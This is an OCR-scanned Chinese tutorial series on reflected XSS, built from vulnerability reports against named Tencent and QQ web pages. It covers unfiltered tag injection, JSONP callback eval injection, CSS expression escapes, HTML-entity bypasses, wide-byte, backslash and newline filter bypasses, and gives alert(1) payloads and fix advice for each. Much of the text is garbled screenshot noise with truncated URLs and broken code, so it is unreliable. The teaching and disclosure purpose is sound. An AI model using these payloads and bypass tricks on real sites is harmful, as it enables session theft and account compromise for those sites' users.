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那些 年 我 们 一 起 学 XSS 


1. 什么 都 没 过 滤 的 人 门 情 ， 


来 源 : 1. 什么 都 没 过 滤 的 入 门 情 ; 


简要 手 述 
只 是 些 反射 型 XSS， 单 单 发 出 来 没有 什么 意义 。 只 是 些 反射 型 XSS， 腾 讯 怎么 修 


都 修 不 完 。 只 是 些 反 射 型 XSS， 我 想 让 它 变 得 更 有 价值 。 只 是 些 反 射 型 XSS， 我 
拿 他 们 做 成 了 教程 。 


详细 说 明 

1. XSS 的 存在 ， 一 定 是 伴随 着 输入 ， 与 输出 2 个 概念 的 。 

2. 要 想 过 滤 挥 XSS， 你 可 以 在 输入 层面 过 滤 ， 也 可 以 在 输出 层面 过 滤 。 
3. 如 果 输 入 和 输出 都 没 过 滤 。 那么 漏洞 料 是 显而易见 的 。 

4. 作为 第 一 个 最 基础 的 例子 ， 


我 们 拿 出 的 是 一 个 什么 都 没 过 滤 (其 实 还 是 有 些 转 义 的 ， 主 要 没 过 滤 < ，> ) 的 
例子 。 


这 种 例子 出 现在 腾讯 这 种 大 网 站 的 概率 不 是 很 高 。 但 是 还 是 让 我 找到 了 一 个 。 
5. 


http://app.data.qq.com/?umod=commentsoutlet&act=count&siteid=3&11b: 
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7. 经 过 测试 ， 我 们 发 现 ，score 这 个 【和 输入】 参数 ， 没 有 进行 任何 过 滤 ， 即 ， 输 入 
是 什么 ， 输 出 就 是 什么 ?” 通俗 点 就 是 “ 吃 什 么 ， 拉 什么 "。。。 如 下 图 : 










a 一 








d=3&libid=9&datald=1480&score=|<img src=1> 色 fonc=haoping&& =1353475. 


”1ibid* :9， “dataid”: 1480, “siteid”": 3, “score": "kimg src=1 ， “type" : 1111, “count":0}Y. 


在 网 由 上 ， 石 键 查看 捍 代 科 的 情况 下 


网 页 中 看 到 的 效果 如 下 : 


L | PE 人 nl J | L 1 中 下 Le ee 


=1J4&func=habping&_ =13534752618: 





id=1480&score=l<iIma%W20src 


“dataid :1480, "siteid” :3, wd “type’ :mull, comt :0}) 


8. 既然 可 以 直接 输入 < > HTML 标签 ， 接 下 来 的 利用 也 就 相对 简单 了 。 


http://app.data.qq.com/?umod=commentsoutlet&act=count&siteid=3&11b: 








效果 如 下 : 


总 http://app.data.qq.com/ ?umod=commentsoutle DX app.data.qq.com 
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修复 方案 


<HTML 标签 ></HTML 标签 > 
[输出 ] 
<HTML 标签 ></HTML 标签 > 


或 


<HTML 标签 >[ 输 出 ]</HTML 标签 > 


a. 通 彰 ， 我 们 只 需要 在 输出 前 ， 将 < ，> 过 滤 挥 即 可 。 


已 


, 这 类 XSS 在 小 型 网 站 中 比较 常见 ， 在 大 型 网 站 中 少见 
c. 这 类 XSS 通常 都 被 浏览 妖 的 XSS 过 滤器 秒杀 了， 所 以 一 般 来 说 ， 威 力 较 小 。 


d. 对 于 普通 用 户 来 说 ， 请 使 用 I|E8 及 以 上 版 本 (并 开启 XSS 过 滤器 功能 ， 默 认 开 
启 ) ， 或 chrome 浏览 器 ， 将 可 以 防御 大 部 分 此 种 类 型 的 XSS 攻击 


2. 输出 在 <script></script> 之 间 的 情 


2. 输出 在 <script></script> 之 间 的 情况 


简要 摘 述 

接着 上 面 一 个 教程 ， 我 们 继续 。 这 个 例子 属于 第 一 例 的 特殊 情况 ， 当 然 也 有 特殊 解 
法 。 也 属于 非常 常见 的 一 种 情况 。 

详细 说 明 


1. 我 们 找到 这 人 么 一 个 点 ， 也 是 输入 和 输出 都 未 过 滤 的 一 个 点 。 相 比 教 程 第 一 例 ， 
特殊 之 处 在 于 ， 是 输出 在 了 ee 之 间 。 


http://activity.soso.com/common/setParentsIinfo.php?callback=aaaaaart 
画 
如 下 图 : callback 参数 未 做 过 滤 。 在 【查看 源 代码 】 下 ， 我 们 可 以 看 到 。 





ee OE ee Sn el || | es Perl, 2 让 
| | Tio. DNDCallDacn 可 本 可 本 可 可 可 上 = 


:YES :2} .try lparent Faasaaaaac 站 lert 《lsescript>kt _ ret}:;lcatchtierr) haaaaaaaac ?lert tl acript>t_ret) :} /a 
(ae \ 和 





<script type='text/Javascript'>document.domain='soso.com';_ret={"_i 





司 一 一 
2. 健 到 这 种 情况 ， 我 们 一 般 有 以 下 解法 。 
2.1 首先 判断 ， 是 否 过 滤 了 < ，> ，/ 等 符号 ， 
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1 et 第 
团 合 挤 前 面 的 sseript> 1 


2.2 如 果 都 没有 过 滤 ， 杀 喜 你 ， 一 般 可 以 直接 XSS 了 。 代 码 如 下 : 


http://activity.soso.com/common/setParentsIinfo.php?callback=aaaaaart 





原理 人 下 图 : 


构造 callback 参数 后 的 源 代 码 


<script type='text/javascript'>document.domain='soso.com';_ret={"_ 
| | 
2.3 如 果 过 滤 了 < ，> ， 那 么 束 无 法 使 用 上 面 的 办 法 了 。 我 们 接 看 看 
3. script 代码 里 的 构造 
友情 提示 : 这 里 可 能 需要 一 点 点 javascript 的 知识 才 行 哦 一 ~ 我 们 可 以 如 下 构造 : 





http://activity.soso.com/common/setParentsInfo.php?callback=evall( : 


可 以 看 到 ， 源 代码 是 下 面 的 样子 。 








| | ] actvity.soso.com/common/setParentsInto.php?callback=leval('alert(1) "vord|s, : 
41 记忆 i ey en 
人 和 人 亲生 walt alert li ) :woidt ret):} srscript: 


也 束 是 说 ， 我 们 插入 的 内 容 ， 使 得 这 一 段 javascript 依然 【语法 正确 】， 能 够 【 正 
确 执 行 ] ， 并 且 能 够 执行 【我 们 所 插入 的 JS 代码 ] 


这 样 我 们 的 目的 融 达 到 了 。 构造 后 的 源 代 码 如 下 : 






ript type= text/ javascript’ >document. dom 


res :2} .try lparent. ewvalt alert ttl) ) :woid 


<script type= text/]javascr1Ipt >document .domaln= Soso.com ;_ret={ 1 
i 六 | 


这 种 输出 在 JS 代码 里 的 情况 十 分 常见 ， 但 是 呢 ? 不久 的 是 ， 像 这 样 没 过 滤 的 情 
却 不 是 很 常见 。 例 如 : var a="[ 输 出 ]"; // 通常 程序 员 会 把 "过滤 掉 ， 这 
样 的 话 ， 一 般 来 说 ， 我 们 融 很 难 构 造 。 


但 是 ， 这 并 不 是 说 ， 束 一定 是 不 能 利用 ， 后 面 我 们 会 拿 腾 讯 一 些 【比较 有 意思 】 的 
例子 ， 来 进一步 说 到 这 个 【输出 在 js 里 】 的 情况 的 一 


修复 方案 


这 类 XSS 的 模型 通常 是 : 





<script>...[ 输 出] ...</script> 
<style>... [输出 ]...</script> 


解决 方案 : 


1. 过 滤 </xxx> 组 合 


2. 针对 输出 在 不 同 的 场景 ， 进 行 合适 的 过 滤 。 


3. 输出 在 HTML 属性 里 的 情 ， 


来 源 : 3. 输出 在 HTML 属性 里 的 情况 








简要 拍 述 

和 前 面 的 不 一 样 的 时 ， 有 时 候 ， 输 出 会 出 现在 HTML 标签 的 属性 之 中 。 

例如 : ” <input value=" 输 出 "> 、 <img onload="... [输出]..."> ， 再 比如 
<body style=",..,[ 输 出 ]..."> .. 这 个 时 候 怎 么 办 呢 ? 

详细 说 明 


1. 大 网 站 一 般 不 是 吃素 的 。 前 面 讲 到 的 基本 情况 ， 一 般 都 很 少 遇 到 了 。 
2. 这 个 时 候 我 们 可 以 把 目光 发 展 一 下 ， 找 一 找 在 【输出 】 出 现在 HTML 属性 里 的 情 


» 
3. 最 为 典型 的 一 种 情况 ， 是 下 面 这 样 的 。 
http://xxxx.com/search.,php?word= 乌 云 欢 迎 您 
HTML 代码 里 则 是 下 面 这 样 情况 的 。 
， 关 键 词 : <input type="text" value=" 乌 云 欢迎 您 " /> 


如 果 这 里 的 word 没 过 滤 双 引号 。 就 会 有 以 下 的 情况 发 生 。 


http:/V/Xxxx,com/search,php?word= 乌 云 欢 迎 您 " onclick="alert(1) 


对 应 的 源 代码 如 下 : 
<input type="text" value=" 乌 云 欢 迎 您 " onclick="alert(1)" /> 
解析 : 


ee 训 
那么 当 用 户 点 击 这 个 文本 框 时 ， 融 会 触发 alert(1) 。 


4. 当然 理想 是 美好 的 ， 现 实 总 是 残酷 的 ， 我 水 平 有 限 ， 并 没有 在 腾讯 找到 这 样 的 例 
于 


因为 绝 大 部 分 这 样 的 情况 ， 腾讯 都 会 做 出 相应 的 过 滤 。 过 滤 方 法 也 挺 简 单 ， 将 

" 过 滤 为 &quot; 融 行 。 过 滤 后 的 代码 如 下 : 

<input type="text" value=" 乌 云 欢迎 您 &quot; onclick=&quot;alert(1)" / 
Ld 


5. 一 般 来 说 ， 上 面 的 情况 ， 过 滤 了 " ， 可 以 说 是 高 枕 无 忧 了 ， 但 是 事实 并 非 如 
此 。 某 些 情 况 下 。 我 们 依然 可 以 继续 XSS。 下 面 以 腾讯 为 例 。 


6. 首先 看 第 一 种 场景 。 


http://follow.v.t.qq.com/index.php?c=follow&a=index&appkey=8010045: 





这 里 的 bg 参数 过 滤 了 【几乎 】 所 有 的 东西 。 但 是 它 输 出 在 了 
<body style="[ 这 里 ]"> 


NT NA 
EE | | | Le [本 | LL | RE | i = 加 村上 二 La -he 





ml» 
2A» 
tle» 脐 讯 微 博 - 与 其 在 列 趟 伞 望 未 如 和 福 这 里 开局 title>》 





1EAd» 


-wle +YEE= text/ cass > 
ErFl1ist Imarein-top: Opx:} 


twle» 
jd stwle=" overflow: auto'backeroumd-eolor:# 卫 是 一 个 乓 ， 获 国 宫 人 民 | "> 


rm id=" "followform » 四 CC 
| elLass= userl]ist” » ,COM 


1 or om ur 十 Tree 1iimr ”人 


更 重要 的 是 ， 这 里 没有 过 滤 \、， 反 和 斜 线 ， 而 css 里 ， 人 允许 使 用 转 义 字符 ， 
\ + ascii 16 进 制 形 式 。 这 样 一 来 ， 我 们 就 可 以 构造 利用 语句 啦 。 


这 里 过 滤 了 expression, 我 们 也 可 以 轻松 的 用 expr\65ssion 绕 过 。 
http://follow.v.t.qq.com/index.php?c=follow&a=index&appkey=8010045: 

es=== 

效果 如 下 : 











十 - 与 蔓 在 别 球 俩 望 不 如 在 这 里 并 启 - Windows internet Explorer 
在 | http;j /followv.t.qgg.com/index.php?c=followB&ia=index&aappkey=801004516&bg='wexpm\65ssion\289%20evah\2: 





3 度 一 下 ， 你 就 知 痊 
ma - 与 其 在 别处 们 四 不 如 在 这 里 并 启 | | 

































































: 持 凯 


这 种 情况 ， 遗 憾 之 外 在 于 ， 基 于 css expression 的 XSS 已 经 进入 暮年 了 ， 只 有 在 
IE6， 7 下 方 能 触发 ， 受众 面 小 。 这 这 里 只 是 作为 一 个 案例 来 讲 讲 。 


Tips: 至 于 这 里 的 转 义 是 如 何 写 的 : 步骤 如 下 : 
例如 e 的 ascii 16 进 制 是 65, 我 们 融 写 为 \65 expression -> expr\65ssion 。 
本 例 缺 陷 点 代码 : 





<body style="overflow:auto;background-color:# 我 是 一 个 兵 ， 爱 国 爱人 民 ; "> 
二 
7. 再 来 看 下 一 个 在 属性 里 的 案例 。 这 个 例子 也 是 比较 前 见 的 。 比 如 : 


<HTML 标签 onXXXX=",,..[ 输 出 在 这 里 ]， 
<a href="javascript: [输出 在 这 里] xx /a 


的 例子 。 正好 ， 在 腾讯 的 这 个 例子 中 ， 以 上 2 个 情况 一 起 出 现 了 。 我 们 以 其 中 一 
种 进行 讲解 。 

http://stock.finance.qq.com/report/search.php?searchtype_y]jbg=y]j]]J]9 
| = | 
看 输出 ， 如 下 ，aaaaaaaa 出 现在 了 2 个 点 。 








:OUrce:stock.finance.qq.com/report/search.php?searchtype yjbg=yjJjJg&searchvalue_ yjbg 
i 4 "text” i Lagenum class=" inputstvleD8ld” onkeyvdown=" if lilewvent,. Eewvtode==13) && ithis. valuel= ")) 

pi stock, finance, gg. com report, search. php?offset=" +this. valuet’ searchtype_yibe=yjjgksearchvalue yibg-bhaaaaaaaad a 
《11 class=" lh0814" Sm /li> 
<1i>Y<div class=" vebe Ya href=" javascript:location= http:/ /stock, finance, gg. Com report/ search php? 

ZetElementByIdt pagernum .waluet aearchtype yjbg=y]j ghsearchvalue_yjbe-haaaaaaaadl SoA ard div li 

ul» 


第 规 来 说 ， 因 为 ”onxxxx="[ 输 出 ]"” 和 href="javascript:[ 输 出 ]" 与 
<script>[ 输 出 ]</script> 没有 太 大 区 别 。 因 为 [输出 ] 所 在 的 地 方 ， 都 是 
javascript 脚本 。 


但 是 人 如 有 果 被 过 寺 滤 ， 往 往 没有 太 好 的 办 法 。 而 上 面 这 
种 情况 ， 则 有 一 个 很 好 的 办 法 绕 过 过 滤 。 


Tips: 
在 HTML 属性 中 ， 会 自动 对 实体 字符 进行 转 义 。 一 个 简单 的 比方 。 


<jmg Src= 1 onerror="alert(1)"> 


和 


<jmg Src= 1 onerror= alLert&#X28 ;1&#X29; “> 


是 等 效 的 


换 让 之， 只 要 上 面 的 情况 ， 没 有 过 滤 & ，# 等 符号 ， 我 们 就 可 以 写 和 人 任意 字 
符 。 看 看 缺陷 点 的 代码 


<11i><input type= text ”1Ld= pagenum ” class= Inputsty1Le0814 ”onkeydoy 
加 二 加 
JS 部 分 我 们 可 以 做 以 下 构 霹 ,由 于 ' 包 过滤， 我 们 可 以 将 ' 写 为 ”&#x27; 





locat ion hr ef 全 有 于 &searchvalue_ yjbg=aaaaaa' 
ee &searchvalue yjbg=aaaaaa'+alert(1)+'' locat: 





Nn pp eh haearchvalus yibe-bhaaaad 
Ue i hasearchvalue Yibe-daaaaaa. 5 4 | 本 + 
En ee= Mets no eh = ce haearchvalue wilbe= 





接 看 我 们 把 代码 转换 为 Url 的 编码 。 & -> %26 ，# -> %23 最 后 利用 代码 如 
下 : 


http://stock.finance.qq.com/report/search.php?searchtype_ yjbg=y]j]]J9 
es 天 
用 户 点 击 页 面 [GO] 按 钮 触发 。 
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缺陷 页 面 的 <a href=""> 触发 点 的 代码 如 下 : 


<11i><div class="yebg"><a href="jJavascript:location='http://stock.f: 


-| 


修复 方案 


四 1 对 攻 出 在 HTML 属性 中 的 情 ; 融 要 特殊 情况 特殊 对 每 ， 该 过 滤 、 的 时 候 ， 
过 滤 \ ,该 过 沽 & 的 情 ， 7 由 ; 过 滤 挝 & 


2. 人 磋 到 有 某 些 修复 的 人 用 正则 去 判断 ， &#xNNN. ，, 而 实际 上 &#XQONN; 
&#XOQONN ，( 后 面 自己 慢 慢 试 。。) 都 是 可 以 的 。 或 者 是 &#10 进 制 ; 以 及 一 些 
特殊 的 HTML 实体 ， 如 &quot; ” 等， 都 要 注意 到 ， 好 抹 烦 ， 最 好 的 办 法 ， 

& 过 滤 为 &amp; :) 





4. 宽 字 节 复 仇 记 [QQ 邮箱 基本 通用 ] 


来 源 : 4. 宽 字 节 复仇 记 [QQ 邮箱 基本 通用 ] 


简要 搬 述 

前 面 教程 第 2 节 ， 说 到 了 输出 在 <script>..</script> 之 间 的 情况 。 也 说 到 了 后 
面 会 再 继续 一 些 有 意思 的 例子 。 

实际 上 ， 我 们 亿 到 的 往往 不 是 那么 好 。 很 多 情况 下 ， 程 序 员 都 是 会 过 滤 的 。 


那么 我 们 怎么 办 呢 ?“ 因 地 制 宜 ， 因 材 施 教 。” 根据 漏洞 的 实际 情况 ， 我 们 可 以 各 种 
绕 过 。 不 知道 这 里 乱用 成 语 没 啊 。 悍 恐 不 安 中 。 


这 里 先 看 看 第 一 种 方法 ， 宽 字 节 绕 过 。 


详细 说 明 

1. 有 一 个 比较 经 典 的 SQL 注入 ， 是 宽 字 节 注 入 。 玩 渗透 的 可 能 对 这 个 都 比较 清 
木 木 

Eo 

2. 有 时 候 ， 宽 字 节 确实 可 以 带 来 奇效 一 一 下 面 我 们 看 腾讯 的 一 个 例子 。 

3. 例子 如 下 : 


http://open.mail.qq.com/cgi-bin/qm_ help_ mailme?s1id=,2,2zh CN&t=%22,;¢ 





我 们 党 试 注入 "来 闭合 前 面 的 双 引 号 ， 但 是 很 悲剧 的 是 ， 双 引号 被 过 滤 了 。。 如 下 
: 


urceopen.mail.qq:com/cgi-bin/qm_help_mailme?sid=,2,zh_CNat=[:alert(]) 





l=—0i1 tcantion—» i 


= Contoent=-Iype conternt= tarxt/htnl;: charset=ebl8030 /2 5 
blsNoCcheck = true:"/ script» 了 


Rt/ Aascript”™ 忆 
99 Com : Ei 


) 


JfFunec = dreuments, Callee: 
tims, nolop) 

ElFUnec., oT op iid ep aetTop?parernt. eet Top() :parent. parent. eetTop)) :window:]} catcht okErro 
vselfFunc,. _ Rolap: 


a 
i 
kk 


et Topt) :catchial Lawal! war toperat Tonl) - 
让 [Et 三 性 quot : alert (ll) tr WO, 


cum < i CtOLS 
二 一 已 让 
证 工交 出 G 王 getTopt) da domimernt, wiltetl <script sre= /zh CHhtanledid or sr CFT 


get Topt), nitPageEwvent || function() (}) (wirdow) ， 


i 





看 到 这 种 情况 ， 一 般 人 估计 会 放 和 弄 了 吧 ， 至 少 说 明 程序 员 
了 了。 


然后 我 们 可 以 看 到 编码 是 : 


<meta http-equlLv=- Content -Type” content="text/html; charset=gb1803( 
4 
gbxxxx 系列 的 编码 ， 那 么 我 们 尝试 一 下 宽 字 节 呢 ? 





http://open.mail.qq.com/cgi-bin/qm_ help_ mailme?sid=,2,zh CN&t=%cO%: 





Ee:Gpen.maill.qgq:tom/cagt-bin/gm help_mailme?sd=,2,2h CNAtAal 





总 et ot» 


Frt— Ty Gott et 二 "text/html: charset=ebiB030 /> 

Beek = true': </scripty er 
2 

seript”™> - 


= A Eent Callee: 
.moTop) 
. noTop=Windowl=parent? (parent. aetToprparert. get Topt}:parent, parent. gat Top ()) :window: -Heatcht_ BEFFOF 
nme. Molop; a 

| 红 潜 联盟 
Jeatchiak{eval(” ‘var top=getTopt).,”, 1 sOM 
est = "| .alert tl}:/) ee 


严 
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弹 个 窗 : 


[my httpa /open.maillgg.com/coubinigm_ help mailmeistds.,2,zh CNAT=Re0 和 e225al 上 


| 来 自 网 克 的 消息 性 这 























起 1 
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个 漏洞 的 成 因 ， 和 传统 的 宽 字 节 漏 洞 并 不 一 样 。 目 测 应 该 是 由 于 过 滤 双 引号 
| 表达 式 写 叶 有 问题 造成 的 。 se %22 变 成 了 %5c%22 ,而 %c0 吃 
挥 了 后 面 的 %5c 。 而 后 面 这 种 情况 ， 在 腾讯 的 相关 站 点 暂时 没有 发 现实 际 案例 。 
如 果 有 ， 欢 迎 大 家 分 享 。 


属 洞 证 明 


不 一 一 列举 了 。 有 这 个 参数 的 基本 都 有 问题 。 


http://msgopt .mail.qq.com/cgi-bin/readtemplate?sid=ktq07D]J]MQCJUAAB( 
http://r.mail.qq.com/cgi-bin/reader main?sid=ktq07D]JMQCJUAABQ&t=aat 
https://exmail.gqq.com/cgi-bin/bizmail?sid=N7fzoGwkeIl8ydyRo,7&act1oi 
https://exmail.gqq.com/cgi-bin/loginpage?errtype=3&verify=true&clieil 
http://open.mail.qq.com/cgi-bin/qm_ help_ mailme?sid=,2,2zh CN&t=%cO"( 
http://open.mail.qq.com/cgi-bin/communication?sid=,2,zh_ CN&t=%cO"Cc 
http://open.mail.qq.com/cgi-bin/feedback_ loop?sid=,2,zh CN&check=f: 
http://exmail.qq.com/cgi-bin/viewdocument?sid=H6Mg9z5XNfqsfhdH,7&f: 


http://reader .qq.com/cgi-bin/rss_ main?sid=MTOtOYwpx56MMZN9&t=aaaa%( 


J | 


修复 方案 


修复 相 天 过 滤 机 制 。 





5. 有 反 冬 线 复仇 记 


来 源 : 5. 反 斜 线 复仇 记 





还 是 在 <script> 之 间 的 场景 ， 某 些 情 况 下 ， 我 们 仅仅 需要 的 只 是 一 个 反 冬 线 ， 瑞 
可 以 绕 过 过 滤 了 。 


1. 有 以 下 实例 点 。 


http://mail.qq.com/cgi-bin/login?vt=passport&ss=aaa&from=bbbédeleg: 
Ss 
对 应 的 输出 ， 如 下 图 所 示 : 





WIEW-SOUTCe mail.qggq-cem, cal-DINogmnivt= Dass Dorte&ss daaatir 







Top ti. location,. href=" /cei-binm loeinpaee?rautoloein-nkerrtyp 
lnel0%253Faction%253D1l1ist%2d26t%203Dsettinel W2520sa%253Dinderh2020Nt ypeh253D1%2520cl11ickpos253D20%25261oc 
Fwt% Dpassport%2abss% dDaaa2dfrom3Dbbbi2ideleeate Url 252Fcei-birm252Fframe html%253Furl%253D%2525252F 
‘settinel0%2525253Fact1ior%2525253D11st%25252526t%252525dDsettinel0%252526sas%20525253Dindex%25252526Nt spe 
W2526252CW2525252C1"+"&org_fun="+"haliastype="+"&ssdaad +"hfromfbbb] +"param="+"&sp=6fadTceSb304TebMIMINTA 


1erntuUin= 十 各 t= 十 各 alias=" 十 总 Fegalli 


经 过 测试 ， 我 们 可 以 看 到 ， 双 引号 是 用 不 了 ， 但 是 反 斜 线 还 可 以 使 用 。 








i 


‘Therrtype=lh werify—hclientuin=" 十 
isa%2503DInded2020NMt wpe iD1l%202t 
idelezate Url%3D%252Fcei-bir%252F] 
20203Dsethinz lI%2020202Bss%20202! 
:如 二 五 忌 3 让 OLDt ; 十 各 from=bbb% 十 名 parar 


那么 这 里 是 否 可 以 成 功 的 XSS 呢 ? 我 们 把 缺陷 代码 部 分 提取 出 来 。 


<script>getTop().1location.href="/cgi-bin/loginpage?autologin=n&err 





2. 可 以 看 到 有 缺陷 的 部 分 是 


location.href="......... "+"&ss=aaaa"+"&from=bbb"+"&param=";// 后 面 省 | 


| = 





我 们 可 以 控制 的 是 aaaa ， 又 不 能 用 " ， 怎 么 办 呢 ? 因为 我 们 可 以 使 用 和 ， 屠 
么 我 们 可 以 杀 掉 aaaa 后 面 的 双 引 号 。 


ee 二 有 RSs=aaaa\ + &from=bbb + &param= ， 


可 以 看 到 代码 的 结果 因为 一 个 反 斜 线 发 生 了 变化 ， 如 下 图 : 
location. hr ef &from=bbb 放 '&param= 
location. hr ef 二 "gss-aaaa\ "+ |elFrom=bbbl'+ "gparame" :| 


为 了 保证 bbb 后 面 的 语法 正确 性 ， 我 们 把 bbb 改 为 一 个 数字 ， 把 bbb 后 面 加 上 
// 来 注释 掉 后 面 的 部 分 。 变 成 以 下 形式 。 





location mine ee "+"&ss=aaaa\"+"&from=1//"+"&param="; 


3. 看 起 来 不 错 哦 ， 但 是 会 出 来 一 些 问题 ， "字符 串 "&from=1 ， 这 样 定 错误 的 ， 
为 & 符 号 的 优先 级 高 ， ("字符 串 "&from)=1 是 无 法 进行 这 种 赋值 操作 的 。 这 样 一 
来 还 是 不 行 。 别 着 急 。 我 们 可 以 稍微 改动 一 下 。 变 为 以 下 形式 。 


jocat ronsnrer 二 下 下 下 十 有 RSs=aaaa\ + &from==1// + &param= ， 


由 于 == 的 优先 级 比 & 高 ， 所 以 语句 相当 于 ("字符 串 ")&(from==1) 


4. 更 顺眼 了 ， 但 是 还 是 会 悲剧 啊 。 由 于 from 未 定义 ， 直 接 和 1 进行 相等 判断 的 
二 会 报错 ， 错误 是 : “from ' 未 定义 。 oO  o 怎么 办 呢 ? 


5. 别 紧张 ，javascript 里 有 一 个 特性 。 如 下 : 
aaa( ); 


function aaal( ){ 


} 


凡是 以 function xxx(){} 形式 定义 的 酌 数 ， 都 会 被 最 优先 解析 。 换 句 话 说 : 


解析 器 在 解析 JS 代码 段 时 ， 会 先 将 function xxx(){} 拿 到 最 前 面 解析 ， 然 后 
再 依次 解析 其 它 的 部 分 。 换 句 话说 ， 上 面 的 代码 ， 实 际 的 解析 顺序 是 


function aaal( ){ 


} 


aaa( ) ; 


利用 这 样 一 个 特性 ， 我 们 的 代码 可 以 改 改 。 


Locationsnrels 0 "+"&ss=aaaa\"+"&from==1;function from( ){}/, 
加 本 = 天 六 宰 | 


这 样 一 来 ， 我 们 的 ”function from(){} 就 会 被 提前 解析 ， 从 而 定义 了 from, 后 
面 from==1 的 时 候 ， 束 不 会 报错 啦 一 一 


6. 故事 往往 是 曲折 的 ， 到 了 这 一 步 ， 我 们 会 发 现 还 是 不 行 。 
看 一 看 源 代 码 吧 ~~ ， 哎 ， 我 们 的 空格 被 转 义 为 了 





&nbsp ; 
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ssDON cess dddWeiTolIm= 三 J 


Li 有 






zi=T 各 BELTtYEE=] 训 WELTILEY 一 让 CILEmtUIT= + gt 十 名 alias=" + 名 reeali: 
"babass%2ddDIindex%2020NMt pes253D1l%2 52sl1ickposm253D20%25261oc 
nctiorWy2520from 人 ti 名 TNTD2FY2F%2deleeate urly3D%252Fcei—bii 
W2252053Dsettinel0%25252520say DInderh2a202020NMt pe a! 
Fras=aaa% + from==1 :functio romt) 

[93d383527ff7T8f2c9d0e90dbT0a35" + ppp= + 让 BBCDD= < script yet 


7. 当然 ， 这 么 一 点 小 事情 ， 难 不 到 我 们 的 ， 我 们 用 注释 符 来 做 分 隔 符 。 /**/ 蔡 
换 空格 ， 有 没有 觉得 和 sql 注入 一 样 了 ， 味 味 。 
于 是 ， 我 们 的 代码 变 为 了 : 

location.href="......... "+"&ss=aaaa\"+"&from==1;function/**/from( ): 
8. 吧 ， 这 次 没有 语法 错误 了 ， 我 们 插 人 我 们 上 自己 的 JS 代码 。 





Eocat ions hr el 0 "+"&ss=aaaa\"+"&from==1;alert(1);function/: 





最 终 的 利用 代码 如 下 : 
因 ， 这 次 是 我 们 的 反 斜 线 为 双 引 号 报仇 啦 |! 


~ 



































二 二 E 了 E , E a i . 云 时 
二 4 http /mail,qq.com/cai-bin/login vt=passport&ss=\Qfrom==0Q:alert(l}:functieor 有 一 马 
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只 有 在 不 登录 QQ 邮箱 的 情况 下 触发 ， 比 较 鸡 肋 ， 实 际 意义 不 大 ， 仅 供 人 研究 。 


修复 方案 


1. 随便 修 修 融 好 。 
2. 菏 些 情况 下 ， 还 是 很 危险 的 。 


= 
6. 换行 从 复仇 记 

来 源 : 6. 换行 从 复仇 记 
简要 折 述 

还 是 在 <script> 之 间 的 场景 ， 某 些 情况 下 ， 我 们 仅仅 需要 的 只 是 一 个 换行 符 ， 就 
可 以 绕 过 过 滤 了 。 它 让 双 引 号 ， 尖 括号 知道 了 “ 它 们 不 是 一 个 符号 在 战斗 ”。 
1. 实 际 场景 是 下 面 这 个 例子 。 


http://datalib.games.qq.com/cgi-bin/search?11i1bid=178&F1ilterAttrAND: 
| 











< 二 Width="22"»>*/td> 
v<td Width="373" class="FS 14 tonte814D 
"搜索 FEA 
<span id="thetitle"Haaaaaaaaadli,sparny 
"+ 的 铺 果 共有 6 条 ' 
* itd 


< 二 日 Width="234"></td» 
td Width="28" /td> 
*/try 
全 


i Fe aaaadadaad 


ne "thetitle").innerH 


ry, 






rtbhody> 
<rtabley 
世人 t 训 六 
四 
rthody> 
rtables 
bb <table width="657" 
2amerlett bebe2,1jpe” 
bk <table Width=" Bn 
Eamey 并 ET 上 -bot jpe’ 


" Tellpaddine="g" tellspe 


" cellpaddine="g" cellspe 
martiese -< /tablex 





| 各 习 身 二 各 昌 各 映 自 昌 


2. 不 错 ， 一 共有 5 处 ， 有 在 HTML 标签 之 间 的 (教程 1) ， 也 有 
在 ee hee 之 间 的 。 但 是 呢 ， 该 过 滤 的 ， < ，> 过 滤 把 了， 该 


过 滤 的 了 过 滤 挥 了 。 


v<*td Width="373" class="FS 14 font814D0"> 






















td width="28"y</tdy 说 过 ; 
Ee 


< Width="234"></td> 
过 下 七 三 入 
<script> 
i+(t "aadadaadadda i 
document ， etE Emern i re Etitle") .EnaarHTNE==" 全 部 竺 惑 "， 
3. 也 融 是 说 传统 的 已 经 不 行 啦 ， 我 们 继续 看 5 处 的 其 他 地 方 。 呀 ， 竟 然 还 有 一 大 上 段 
ee 






































































































































^ | 全 Ct 二 
| 村 二 于 才 与 
Elemert, styl1 


ct er al) 
-ii 

A document .+rmsearchpost, FilterAttrAND, value=at.+t 
A document .frmSearchPpost ,FilteryaluehND. valuyes 








于 
1 





ee 人 scFipty I 


4. 吧 ， 这 样 一 来 ， 是 否 会 想到 这 样 一 个 用 法 呢 ? 


nANH1ine: 


// 我 是 注释 ， 我 爱 洗澡 ， 哦 一 哦 一 哦 一 [我 是 输出 ] 


如 果 可 以 使 用 换行 符 的 话 。 
这 样 alert(1); 融会 和 被 成 功 执行 。 
5. 恩 ， 带 着 这 样 一 个 想法 ， 我 们 不 难 构 造 出 以 下 利用 。 


http://datalib.games.qq.com/cgi-bin/search?11i1bid=178&F1ilterAttrAND: 
司 本 
看 下 输出 。 品 ， 果 然 没 过 小 。 





那些 年 我 们 一 起 学 XSS 


OSearchResult .eetPpageIntor 
0SearchResult ,EetpageInfort 


/rgt "paee intaol").,innerHTML 
/rit"page into2") .innerHTML 


7 /村 

Hi 

/rfunction initsearchtattr,wval) 

/rt 

7 了 document ,frmsearchpost.FilterittrANB. value=att| 
7 document .frmsearchPpost. FiltervaluehND.,. valuUe=wva. 
Ho 

/1 Was --》 挤 行 


nk 
/Ailinitsearcht"3682"," . 
alerttlT /AY); 








1 
| 


| | "mm 1 


6. 这 样 ， 这 一 次 我 们 的 换行 符 立 功 了 ， 它 不 是 一 个 符号 在 战斗 ! 


修复 方案 


尽量 不 要 在 JS 的 注释 里 输出 内 容 。 还 挺 危 险 的 。 


AN 


6. 换行 从 复仇 记 


24 


7. 宽 字 节 、 反 斜 线 与 换行 竺 一 起 复仇 记 


来 源 : 7. 宽 字 节 、 反 斜 线 与 换行 符 一 起 复仇 记 


这 一 次 ，3 个 冢 伙 一 起 上 啦 一 


详细 说 明 
1. 实例 点 如 下 : 


http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=d1( 
剧 EE 
老 规 和 检 ， 继 续 看 我 们 的 输出 。 


Fe a et pp ME eT ee ,| 
下 |_| AH A sr Ael | IaIMme==CenterseaerchsNntmMmhoTUerDVY=aAaadadadaddaddaadad fi.r 


于 一 一 由 
和 癌 8 村 A 可 问 百 召 吾 召 召 召 召 召 召 
<form name= 十 TWOoearechFost method= post action= 1ndex.T A 


<input tvpe="hidden” name="mod” walue=" seareh” /> 

